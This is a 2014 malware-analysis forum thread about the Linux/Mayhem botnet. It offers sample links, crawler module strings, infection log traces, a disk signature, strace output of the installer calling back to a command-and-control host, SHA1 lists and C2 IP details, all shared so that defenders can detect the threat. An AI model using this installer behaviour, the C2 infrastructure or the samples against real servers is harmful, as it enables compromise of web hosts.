A forum for reverse engineering, OS internals and malware analysis 

Linux/Mayhem

Forum for analysis and discussion about malware.

Re: Linux Mayhem

 #23521  by unixfreaxjp
 Wed Aug 06, 2014 6:03 am
Latest incident Mayhem samples analyzed in here: http://pastebin.com/VPpjSzxx
PHP dropper: https://www.virustotal.com/en/file/03c8 ... /analysis/
ELF installer x32: https://www.virustotal.com/en/file/8983 ... /analysis/
ELF installer x64: https://www.virustotal.com/en/file/77d7 ... /analysis/
Mayhem ELF CMS URL crawler module: https://www.virustotal.com/en/file/3d07 ... /analysis/
Mayhem ELF Wordpress/Joomla! password bruter module: https://www.virustotal.com/en/file/3ec6 ... /analysis/

If you work in AV, please do effort in raising these ELF detection ratio. Thx

#MalwareMustDie!!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html
Attachments
Use RAR5; pwd: infected
Note (KM members only): except the encrypted drive almost all was cracked. Need a fix in the reader C codes (on it)
(70.58 KiB) Downloaded 151 times
Last edited by unixfreaxjp on Wed Aug 06, 2014 8:46 am, edited 2 times in total.

Re: Linux Mayhem

 #23522  by unixfreaxjp
 Wed Aug 06, 2014 6:30 am
A week ago's Mayhem incident. Starting this one , new code installer was started, giving up some libworker.so to more generic namings:
Image

PHP Installer (dropper): https://www.virustotal.com/en/file/dddb ... /analysis/
Code snips: http://pastebin.com/xa4sGV5a
ELF x32 Mayhem Installer: https://www.virustotal.com/en/file/803d ... /analysis/
ELF x64 Mayhem Installer: https://www.virustotal.com/en/file/9191 ... /analysis/

This is the installer's callback:
Image

I attached PCAP, PHP dropper snips & .so installer samples. See comment (members only).
Please help to raise the detection ratio of these ELFs.

#MalwareMustDie!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html
Attachments
Use RAR5, pwd: infected
cnc sinkholed
(33 KiB) Downloaded 125 times
Last edited by unixfreaxjp on Wed Aug 06, 2014 10:40 am, edited 3 times in total.

Re: Linux/Mayhem

 #23523  by unixfreaxjp
 Wed Aug 06, 2014 6:50 am
This is a special post, I want to explain about the ELF Mayhem crawler.so, a web remote trigger component/module of Mayhem.
It works to trigger Mayhem installer(PHP) or activated some remote injection.
It is the most used module in Mayhem package by the moronz who used it (you used to call these by "operators" or "bad actors")
The attacker uses this by the Mayhem GUI to connect to a Mayhem infected site to attack ANOTHER infected new sites.
The crawler codes is simple seen, it is a good parameter to block this module's operation.
Code: Select all
0x01808    CRAWL %s level exceeded
0x01821    GET %s HTTP/1.0
0x01832    Host: %s
0x0183F    >,%s,%s%s
0x0184A    http://
0x01857    GET %s%s HTTP/1.0
0x0186A    Host: %s
0x01877    >,%s,%s%s%s
0x01884    >,%s,%s
0x0188D    Q,crawler,%s,new domains %d%s
0x018AC    Q,crawler,%s,-
0x018BC    crawler
0x018E8    /wp-login.php
0x018F6    name="log"
0x01901    /administrator/index.php
0x0191A    joomla
Aiming infected Joomla! and Wordpress sites.

You'll see the trace usage of this crawler in your server's log as per below:
Code: Select all
ns312431.ip-188-165-217.eu - - [31/Jul/2014:11:02:44 +0900] "GET /wp-content/plugins/XXXX/404.php HTTP/1.1" 200 95 "-" "-" "-" -rw-rw-rw- 1 XXXX cst 6624 Jul 31 11:03 crawler.so
So it is remotely executable, not necessarily via LD_PRELOAD, same as the bruteforce.so and cmsurls.so posted previously. And it was all compiled as package UI snapshot as per announced by Yandex team here: https://www.virusbtn.com/virusbulletin/ ... -fig17.jpg

VirusTotal detection is ..low.. I mean..it is 1 (one)..repeat..ONE! (1/53) https://www.virustotal.com/en/file/637a ... 406876476/

if you work in AV and your AV has Linux scanner product, please make sure your product can scan this, because I found this module in MOSTLY all Mayhem infected sites now, and they are all undetected (sigh..).

Sample is attached (members only). #MalwareMustDie!!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html
Attachments
Use RAR5, pwd: infected
Ping me questions to @malwaremustdie or use PM. Please bear with delays.
(3.37 KiB) Downloaded 102 times
Last edited by unixfreaxjp on Wed Aug 06, 2014 8:47 am, edited 1 time in total.

Re: Linux/Mayhem

 #23524  by unixfreaxjp
 Wed Aug 06, 2014 8:05 am
This is the Mayhem incident in July 30th. The attacker was detected to install the installer as per snipped in log below:
Code: Select all
178-137-18-246-lvv.broadband.kyivstar.net - - [28/Jul/2014:01:16:02 +0900] "GET /wp-content/themes/XXXX/styleimg.php HTTP/1.1" 200 85 "-" "Python-urllib/2.7" "-"
You can see the installer in the attached file (with the binary stipped, sorry)
This installer will create the encrypted drive ".fghv". About this drive, has typical sigs in the first sector as:
Code: Select all
0000   23 74 FA 49 37 F6 DF D0 17 72 08 E1 B1 73 B3 1D    #t.I7....r...s..
0010   B4 D9 54 45 38 5A A9 AB 5D E8 BE 47 30 99 69 EE    ..TE8Z..]..G0.i.
0020   FD FB 8F DB 18 46 E9 31 72 9B 45 0D 03 ED 2E FB    .....F.1r.E.....
0030   BF 0E FB B6 80 F6 40 70 2E 55 57 96 EB EF AC E6    ......@p.UW.....
0040   D8 D4 E9 DE D9 1E 13 F7 D8 D4 E9 DE D9 1E 13 F7    ................
Noted: I think one can apply this sig to Yara or AV scanner to check whether the server is infected.
The tools in below links can be used to read this drive:
http://ultra-embedded.com/fat_filelib
https://github.com/freeoks/SD0_reader
The drives was mounted in every infection of Mayhem with the read write flag, in memory is seen as:
Code: Select all
host    15448  mmd  mem    REG   RW 9,2 12582912 29763122 /home/mmd/0x02E/007/.fghv
The insides will be seen files used for the attack as per annonced by Yandex team here: https://www.virusbtn.com/virusbulletin/ ... -fig11.jpg

In this post I will (generally) debug the installer, with some comments.
The point of this information is to form the mitigation for the threat installation.

1. Since the nature of installation need the LD_PRELOAD interception of the NIX API called /usr/bin/host, you will see every Mayhem infection is loading these modules (i.e. in x64):
Code: Select all
 /lib/x86_64-linux-gnu/libnss_dns-2.13.so
 /lib/x86_64-linux-gnu/libnss_files-2.13.so
 /usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so
 /lib/x86_64-linux-gnu/libm-2.13.so
 /lib/x86_64-linux-gnu/liblzma.so.5.0.0
 /lib/x86_64-linux-gnu/libattr.so.1.1.0
 /usr/lib/libisccc.so.80.0.2
 /lib/x86_64-linux-gnu/libz.so.1.2.7
 /lib/x86_64-linux-gnu/libresolv-2.13.so
 /lib/x86_64-linux-gnu/libkeyutils.so.1.4
 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
 /lib/x86_64-linux-gnu/libcom_err.so.2.1
 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
 /usr/lib/libGeoIP.so.1.4.8
 /lib/x86_64-linux-gnu/libc-2.13.so
 /usr/lib/x86_64-linux-gnu/libxml2.so.2.8.0
 /lib/x86_64-linux-gnu/libpthread-2.13.so
 /lib/x86_64-linux-gnu/libcap.so.2.22
 /lib/x86_64-linux-gnu/libdl-2.13.so
 /usr/lib/libisc.so.84.1.0
 /usr/lib/libisccfg.so.82.0.3
 /usr/lib/libbind9.so.80.0.7
 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
 /usr/lib/libdns.so.88.1.1
 /usr/lib/liblwres.so.80.0.3
 /home/mmd/0x02E/007/libworker.so
 /lib/x86_64-linux-gnu/ld-2.13.so
the libworker.so is the malware, libnss is used to resolve the DNS, and some modules specifically use by malware itself (self explanatory..ie: that crypto & GeoIP)

2. Mayhem installer process:
(malware installer blah.so started with initial PID)

// process self-detached execution after /usr/bin/hosts was executed:
Code: Select all
execve("/home/mmd/0x02E/007/1.20322", ["/home/mmd/0x02E/007/1.20322"], [/* 20 vars */]) = 0
// local addr INET
Code: Select all
socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS SETTING")}, 16) = 0
getsockname(6, {sa_family=AF_INET, sin_port=htons(47377), sin_addr=inet_addr("YOUR_IP")}, [16]) = 0
// uname executed by shell escape:
Code: Select all
execve("/bin/sh", ["sh", "-c", "/bin/uname -a"], [/* 19 vars */]) = 0
write(1, "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 73 <unfinished ...>
// read the ELF after reforked beforehand..
Code: Select all
read(8, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
fstat(8, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
// self deletion..creating the encrypted drive:
Code: Select all
unlink("/home/mmd/0x02E/007/libworker.so") = 0
open(".fghv", O_RDWR)       = 8
// reforked, attempt to access "/" (server's root), self closing +open /dev/null..
Code: Select all
clone(Process xxx attached
umask(0)                    = 022
setsid()                    = 20333
chroot("/")                 = -1 EPERM (Operation not permitted)
  :
close(0)                    = 0
close(1)                    = 0
  :
close(1021)                 = -1 EBADF (Bad file descriptor)
close(1022)                 = -1 EBADF (Bad file descriptor)
  :
open("/dev/null", O_RDONLY) = 2
open("/dev/null", O_RDONLY) = 3
// preparing sending DNS request..
Code: Select all
open("/etc/resolv.conf", O_RDONLY) = 4
uname({sys="Linux", node="1x111", ...}) = 0
connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
open("/etc/nsswitch.conf", O_RDONLY) = 4
read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 475
open("/etc/ld.so.cache", O_RDONLY) = 4
open("/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY) = 4
open("/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY) = 4
// querying IP address for the CNC..
Code: Select all
socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
sendto(4, "\242U\1\0\0\1\0\0\0\0\0\0\vimbosatelit\3biz\0\0\1\0"..., 33, MSG_NOSIGNAL, NULL, 0) = 33
recvfrom(4, "\242U\201\200\0\1\0\1\0\0\0\0\vimbosatelit\3biz\0\0\1\0"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 49
// callback sent:
Code: Select all
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("62.75.179.242")}, 16) = 0
write(4, "POST /go.php HTTP/1.0\r\nHost: imb"..., 173) = 173
read(4, "HTTP/1.1 404 Not Found\r\nServer: "..., 32768) = 367
read(4, "", 32768)          = 0
This CNC is in Germany, an abused host, I wrote this for the LE follow as verdict:
Code: Select all
$ echo 62.75.179.242   |bash origin.sh
62.75.179.242|static-ip-62-75-179-242.inaddr.ip-pool.com.|8972 | 62.75.128.0/17 | PLUSSERVER | DE | INTERGENIA.DE | INTERGENIA AG
3. Samples for this incident are attached with the PCAP. (members only)
In VT, the
x32 installer ELF: https://www.virustotal.com/en/file/4275 ... 406866832/
x64 installer ELF: https://www.virustotal.com/en/file/dce6 ... 406866857/

If you work in AV entity and suppoting linux/freebsd OS in your marketing pamflets, please help to raise detection ratio of this threat by registering the shared sample to raise the detection ratio. This threat is no joke, it aimed all of Wordpress and Joompla to be a huge CHAOS botnet..

#MalwareMustDie!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html
Attachments
Use RAR5, pwd: infected
(33.64 KiB) Downloaded 121 times

Re: Linux/Mayhem

 #23780  by K_Mikhail
 Thu Sep 04, 2014 4:56 pm
Here is the more actual list of Mayhem .so binaries (SHA1's):
Code: Select all
039f55c3c44e0a10da38866cc4c920bce538410b_bruteforce.so
0759dd4602c0e7894ada36a5bbadad6c4ac9cd9c_bruteforce.so
0db15d93c71ddda6327122c49ffdb5f107e6d2b7_libworker.so
0f1c66c3bc54c45b1d492565970d51a3c83a582d_libworker.so
116b2ef01b6a0684f6da0cbf51987ac34880ede8_libworker.so
1386353522eeaacf9924b61c4daa4b2c72acdfdc_libworker.so
1a4e7d1077306bea3cb4da1c6c0623c98f634835_libworker.so
1bc66930597a169a240deed9c07fe01d1faec0ff_libworker.so
246652e4d014df7729059103d17a28cab8d2cbb2_libworker.so
247e0457194e7f9b63544d474c7f14b338a926ff_libworker.so
28dd90148019f5b357144e01d9327e0d4aab9792_cmsurls.so
2940ce0a1fdef9f7c177cb6f8fec86e5982bdc97_libworker.so
2a1effc7734dff394fafdbb811d9cfeeceefee8e_libworker.so
2cc2ca86453342f196edb1d1bdcc69e9c814d401_rfiscan.so
319ce46d2a366e8c8eb11d08b822cf9529621c3c_libworker.so
35b76927c5b40441dbe4e4fe4cd414d90ba1ca8f_libworker.so
3bb00cbeac227c60594099fd9461c03bf3c64582_libworker.so
3c6934da2b1b2252608ba904b85c37f9fb11fc8f_libworker.so
3d0eb51d89a18c29a333e5beb049c3f65c8f6b3b_heartbleed.so
3e694325d384df00fbea0c8fe5d0192f2c7a4540_libworker.so
44a81b036284a965d83eacf178d14183a57d3489_libworker.so
463eb52c73445ea83e59ff55f1db119921b38d59_bruteforceng.so
47eca09cfe931f4ee5cb6ffa68c0332ef414e859_libworker.so
4f48391fc98a493906c41da40fe708f39969d7b7_libworker.so
51699011a839aa62f9906393044c3316f4e36022_libworker.so
525de21b0c119f7f8ce6a93173414389ecc627ba_cached.so
55269ece955397e64d356dcd5b1b08dc2d26eb20_libworker.so
55dd7d3d692b9f00f82b98cefe37f538fe6c0734_libworker.so
568f529af326b1d010faf0bd7ba66361f2e10465_libworker.so
56b332c78c4cc9fd0c3262dc8346fc8f5f109d6b_crawlerng.so
583af93281999a925f497d643dd744f31ca1319b_libworker.so
5b7012e52a238079748640f6ca94d12cdbd1b038_libworker.so
5de6f598040fda15de83d9e2c8b53f8ff9bb4d3f_libworker.so
60ae2f0c8fb8f4121828c547b333c4c643b28c5a_libworker.so
6405e0093e5942eed98ec6bbcee917af2b9dbc45_libworker.so
680c2113ffb00aea02c9ea836adc45ac63eb8610_libworker.so
68ece6f8913d6250d5654df0098035ce045a8611_rss-aggr.so
6c17115f8a68eb89650a4defd101663cacb997a1_libworker.so
6c376555bc8f1ba31025797806ac5f1bc1597832_cmsurls.so
6d91ba3dad82c8544330d3da20b72c657eb83ecd_libworker.so
71c603c3dbf2b283ab2ee2ae1f95dcaf335b3fce_libworker.so
7204fff9953d95e600eaa2c15e39cda460953496_libworker.so
772eb8512d054355d675917aed30ceb41f45fba9_libworker.so
7b89f0615970d2a43b11fd7158ee36a5df93abc8_libworker.so
85e84f78568f5846b997807d5896cb712f0945b4_libworker.so
86217b4fd4c42e04d243f2130a8e9e4b5070c9a3_libworker.so
87dd21567b853a1ec7afefaee405880e1ec543d9_libworker.so
88014cedf42937d2f2dd904cc015bf4c809e1f89_libworker.so
8899859332990047a8ad1443cab029ad663d7bad_rss-aggr.so
8da0122382342c7692b6f4ebd94ac09a99e66f37_libworker.so
90ffb5d131f6db224f41508db04dc0de7affda88_libworker.so
9104620758faa58014d1f8310b5c049c6c7e1a53_libworker.so
985a61d97c88cb484ea345d584b736df1928ecf3_libworker.so
9c7472b3774e0ec60d7b5a417e753882ab566f8d_libworker.so
9fac4e729cbda5950931b826335d817c8a61765f_libworker.so
a05b5849e08bae3ddba1d6274b9179c4f81075cf_libworker.so
a17cb6bbe3c8474c10fdbe8ddfb29efe9c5942c8_libworker.so
a99cfde9eea4a0454b1e5fc9a4038c2445a68027_libworker.so
ab8f3e01451f31796f378b9581e629d0916ac5a5_libworker.so
ae828f04fc53c49370eeae122c9f9d26b2ae50c5_libworker.so
af7c1e4ef63fdd07979479779101f3774dfcc74c_libworker.so
b4795623ae31202710ac569aa04d96eda1e504ba_bruteforceng.so
b72e989fcfc147aed3ab1e6a7b6510d8b3ef503c_ftpbrute.so
bb163db5179b32af832611a8b2c4af0787c3d958_crawler.so
bf2ad57c8847ade5f582cd55963932600a639654_wpenum.so
c0b32efc8f7e1af66086b2adfff07e8cc5dd1a62_libworker.so
c31f35ae3242b8b16635f766ebcc3bf0e596d826_libworker.so
c5d3ea21967bbe6892ceb7f1c3f57d59576e8ee6_libworker.so
c635bff21668b4a3667fa8b6805573569a6abdb4_crawler.so
c6f8a5f63f15ff8a73add693e5f2b58bc2063329_crawlerip.so
c855a623bf23e7cb22c0e0e2854f74f7c70aadfe_wpenum.so
cb7a758fe2680a6082d14c8f9d93ab8c9d6d30b0_libworker.so
cbaab3c8b6659f6b340c403729e542c3a17c04d8_crawler.so
cd00010d9454c504bebec00668c40c0722f2460f_libworker.so
d020020b87568a8d3e4367c44a361effa9c88798_bruteforce.so
d0f029375bb9609034297354adafb866971c5503_libworker.so
d2b5a5fa696e6be13b3503c376d7d18112f3f427_libworker.so
d41e9d09827c9c4b2ba99642b3913d4a089dd200_bruteforceng.so
d4a1bc99eaf8d22f573a0a063b27b62111a6a192_bruteforce.so
da9fbebba9cf3d12cd6b042266746a2425bc3ee1_bruteforce.so
dc4cf21691645f856c989b935b9db7237c91e37a_libworker.so
de68cb6a027d366190b7e74255c466a6fb28e49b_cmsurls.so
dff117ac09221f55719d7b7b52aaee778249ab8c_wpenum.so
e1057d25b81044c947286d8910e7277bfb08787e_libworker.so
e785058dd3ed369405b0de829689f496f8b46960_libworker.so
e7ff524f5ae35a16dcbbc8fcf078949fcf8d45b0_atom-aggregator.so
ea6f73259409d8250f2b582069bcfe1369da5686_cached.so
ecfddf0af1138fb74549473bc460347b719833ad_libworker.so
f5e8b5f071d432bcd2aefa8bda1953090ba4dcec_bruteforce.so
f5f10ebec36b96f3b9fe664521fd494e69df3602_libworker.so
f73981df40e732a682b2d2ccdcb92b07185a9f47_atom-aggregator.so
fa2763b3bd5592976f259baf0ddb98c722c07656_libworker.so
fa7e9dad7ca05e1c2405cc1aded68e537aacc3c3_libworker.so
fd8d1519078d263cce056f16b4929d62e0da992a_libworker.so
fe59df58e03c304b2554117d41c2076233f1c165_libworker.so
PHP-droppers list (SHA1's):
Code: Select all
001b40c56d51759f904a79335172b9e6bba665a8_mayhem_starter.ph#
0088c301412c2d1bb28c82ea3eaf77c66848bf84_system.ph#
0bf5a751971f32ea8be0874ea8ea2b8bc325e211_function_php.ph#
1f7adac290d7c9ea201bf13481877e04fd2c3eec_oldcash.ph#
276169b217efc075ed546503b10c8a665f901676_mayhem_starter.ph#
450a83f9d635485cc3362ec6595534e9bfc6b6fa_log.ph#
5df3bd8c9d1a748efb0b1346b78a3536f4340876_system.ph#
687d7f48f6424efbe2a36b6036364f235d0a6fe3_mayhem_starter.ph#
8fd0ddb9272c4c3979a6fc16d3deb17ddce9eb9a_404.ph#
91371d109310484f1d002af15dccc2985f6d9130_htm_themes.ph#
94a475abf7b85bf8770be60f1c2b230cdcfbfb35_rss.ph#
9a368f5b3f322c61fb0db2843ea2e50facc07dfa_atom-lists.ph#
a4db6451b57dc3c833e062b481420df4eccee0ed_rsscollect.ph#
aaf46e7eb3b22f55b242569d6d559c2fdd5a96bf_404_bl.ph#
ce9a1052cea1c39a9f2d0cd7ca43ffb4cc71c0bd_exostyle.ph#
d75054424b98af596e8b1d8e1b3923ca2462e3ee_system.ph#
e259667922fcbeb54e8d18e2b10e7de0582685cc_styleimg.ph#
e27c526e42fc0fa832dfd81fe8fc45c29524c540_jquery.js.ph#
f06c45db3200a112bf5f42628b6f2b4cf1f17d7c_atom-conf.ph#
f52a54ede7c1211288c659a9d25d837b06992454_mayhem_starter.ph#
f7413e74d09f867ddfa2a2a98e7512ff48fd613b_oldstyle.ph#
f89aedb3994c5939a2f92980c81331c639c065e1_sears.ph#
Files with SHA1's:
5ddebe39bdd26cf2aee202bd91d826979595784a
6992ed4a10da4f4b0eae066d07e45492f355f242

are still absent.

Re: Linux/Mayhem

 #24073  by unixfreaxjp
 Tue Oct 07, 2014 6:50 am
#Shellshock version spotted. Installer is in Perl: http://pastebin.com/rdTJ4HyJ
Use my small script to extract the binaries safely here: https://gist.github.com/unixfreaxjp/aca ... ede2c70cde
I will not disclose the shellshock used since a higher matter security is involved.
Samples:
https://www.virustotal.com/en/file/4e9c ... 412653706/
https://www.virustotal.com/en/file/87f7 ... 412653725/
At this moment, the things that I can share is what written in virus total comment.

CNC:
Code: Select all
IP: 188.120.246.60
Reversed IP: dackjaniels.net.
ASN: 29182
CIDR: 188.120.240.0/21
ISP Prefix: ISPSYSTEM
Country: LU / Luxembourg
ISP: ISPSYSTEM.COM / ISPSYSTEM CJSC

Some snapshot as poc of CNC:
Image
Attachments
7z/infected
(132.87 KiB) Downloaded 95 times
 Return to “Malware”